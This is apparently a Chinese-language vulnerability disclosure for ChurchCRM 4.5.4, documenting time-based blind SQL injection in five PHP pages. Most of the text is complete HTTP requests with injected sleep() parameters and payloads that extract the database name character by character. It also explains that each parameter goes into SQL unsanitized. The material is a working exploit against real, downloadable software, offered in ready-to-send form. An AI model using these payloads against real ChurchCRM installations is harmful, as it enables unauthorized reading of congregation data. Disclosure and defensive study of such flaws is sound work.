简介
ChurchCRM 是一款开源教会 CRM 和管理软件,ChurchCRM 存在 SQL 注入漏洞
漏洞厂商:ChurchCRM https://churchcrm.io
影响版本:ChurchCRM 4.5.4
下载地址:https://github.com/ChurchCRM/CRM/releases/download/4.5.4/ChurchCRM-4.5.4.zip
WhyCameEditor.php
GET /WhyCameEditor.php?PersonID=1+and+sleep(5) HTTP/1.1
Host: churchcrm.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: CRM-6f9ef3cec1f143fef933f2946169ad33=sj0db931o816ckr26g5gpf6s38
Connection: close
data:image/s3,"s3://crabby-images/40fea/40fea5e9e940853e29b2a2e3b5deb86afdf5ce20" alt=""
data:image/s3,"s3://crabby-images/39605/39605ab88209bfafe15286222bc9e1c832f6ab71" alt=""
构造payload
(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)
data:image/s3,"s3://crabby-images/c513b/c513b7400b1a3a646cea4d3ad463718954a7e4e5" alt=""
(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end) 为 true 与查询出的数据库名 churchcrm 第一个字母 c 的 ascii 相符合
漏洞代码WhyCameEditor.php
data:image/s3,"s3://crabby-images/48f98/48f98876924fece8a0907710a6c9332ba438c405" alt=""
通过 GET 获取到的参数 PersonID 未经处理就直接拼接到 SQL 语句中
CanvassEditor.php
GET /CanvassEditor.php?FamilyID=1+and+sleep(5) HTTP/1.1
Host: churchcrm.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: CRM-6f9ef3cec1f143fef933f2946169ad33=sj0db931o816ckr26g5gpf6s38
Connection: close
data:image/s3,"s3://crabby-images/96a18/96a1876910d8a0124e5776a9c5d5ab2796db26f3" alt=""
data:image/s3,"s3://crabby-images/397fe/397fee5f002c163818ef5a4dd00c707257299bff" alt=""
构造 payload (
if(ascii(substr((select+database()),1,1))=99,sleep(5),1))
data:image/s3,"s3://crabby-images/96eac/96eac34b3804c78abbdb178bb16bfc5a9e840c61" alt=""
and(if(ascii(substr((select+database()),1,1))=99,sleep(5),1)) 为 true 与查询出的数据库名 churchcrm 第一个字母 c 的 ascii 相符合
CanvassEditor.php
data:image/s3,"s3://crabby-images/bd2d6/bd2d67765a0ff50bbe15f9b2433716413e1c3cd2" alt=""
通过 GET 获取到的参数 FamilyID 未经处理就直接拼接到 SQL 语句中
AddDonors.php
GET /AddDonors.php?FundRaiserID=1+and+(sleep(5)) HTTP/1.1
Host: churchcrm.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: CRM-6f9ef3cec1f143fef933f2946169ad33=sj0db931o816ckr26g5gpf6s38
Connection: close
data:image/s3,"s3://crabby-images/f4005/f40057ad7cb61aa9bd9ee2bf4704cd4aa47ff564" alt=""
data:image/s3,"s3://crabby-images/64939/6493953ffd8cd30ef5b789be91c725932ffe1342" alt=""
构造 payload (if(ascii(substr((select+database()),1,1))=99,sleep(5),1))
data:image/s3,"s3://crabby-images/27c8d/27c8d24efc6a1018ae73e99793f5393c229cf5ee" alt=""
and(if(ascii(substr((select+database()),1,1))=99,sleep(5),1)) 为 true 与查询出的数据库名 churchcrm 第一个字母 c 的 ascii 相符合
漏洞代码文件AddDonors.php
data:image/s3,"s3://crabby-images/75c22/75c22a1fb000537a31256dfe304f2b486234351b" alt=""
通过 GET 获取到的参数 FundRaiserID 未经处理就直接拼接到 SQL 语句中
GetText.php
GET /GetText.php?EID=1+and+sleep(5) HTTP/1.1
Host: churchcrm.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: CRM-6f9ef3cec1f143fef933f2946169ad33=sj0db931o816ckr26g5gpf6s38
Connection: close
data:image/s3,"s3://crabby-images/a40ca/a40ca1ea9900eda37340388870d4d9fb1d95ad4c" alt=""
data:image/s3,"s3://crabby-images/d8921/d8921f351aa988dfdd895658a5f485ec593bd04f" alt=""
构造 payload
(if(ascii(substr((select+database()),1,1))=99,sleep(5),1))
data:image/s3,"s3://crabby-images/937be/937be576a417b013288434ed762e270c4f7b1bb1" alt=""
and(if(ascii(substr((select+database()),1,1))=99,sleep(5),1)) 为 true 与查询出的数据库名 churchcrm 第一个字母 c 的 ascii 相符合
漏洞代码文件GetText.php
data:image/s3,"s3://crabby-images/8fa39/8fa39498325c836c4b2d5aae7cc38fc81f408c3f" alt=""
通过 GET 获取到的参数 EID 未经处理就直接拼接到 SQL 语句中
QueryView.php
POST /QueryView.php?QueryID=15 HTTP/1.1
Host: churchcrm.test
Content-Length: 257
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://churchcrm.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://churchcrm.test/QueryView.php?QueryID=15
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: CRM-6f9ef3cec1f143fef933f2946169ad33=sj0db931o816ckr26g5gpf6s38
Connection: close
searchstring=test%'+and+(select*from(select(sleep(5)))a)#&searchwhat=CONCAT%28COALESCE%28%60per_FirstName%60%2C%27%27%29%2CCOALESCE%28%60per_MiddleName%60%2C%27%27%29%2CCOALESCE%28%60per_LastName%60%2C%27%27%29%29&Submit=%E6%89%A7%E8%A1%8C%E6%9F%A5%E8%AF%A2
data:image/s3,"s3://crabby-images/eaa03/eaa036e729fb9016a2489e92550d69d4de75a214" alt=""
data:image/s3,"s3://crabby-images/059fd/059fd2faa10f38dd6128645ea23ec49efd8b6872" alt=""
构造 payload (if(ascii(substr((select+database()),1,1))=99,sleep(5),1))
data:image/s3,"s3://crabby-images/10392/10392b33bd1d2e0ad03a5c1edbeaac95847d8b39" alt=""
and(if(ascii(substr((select+database()),1,1))=99,sleep(5),1)) 为 true 与查询出的数据库名 churchcrm 第一个字母 c 的 ascii 相符合
漏洞代码文件QueryView.php
data:image/s3,"s3://crabby-images/bcd4e/bcd4e65401a65b8e79e4ee88b78ececbeb29bee4" alt=""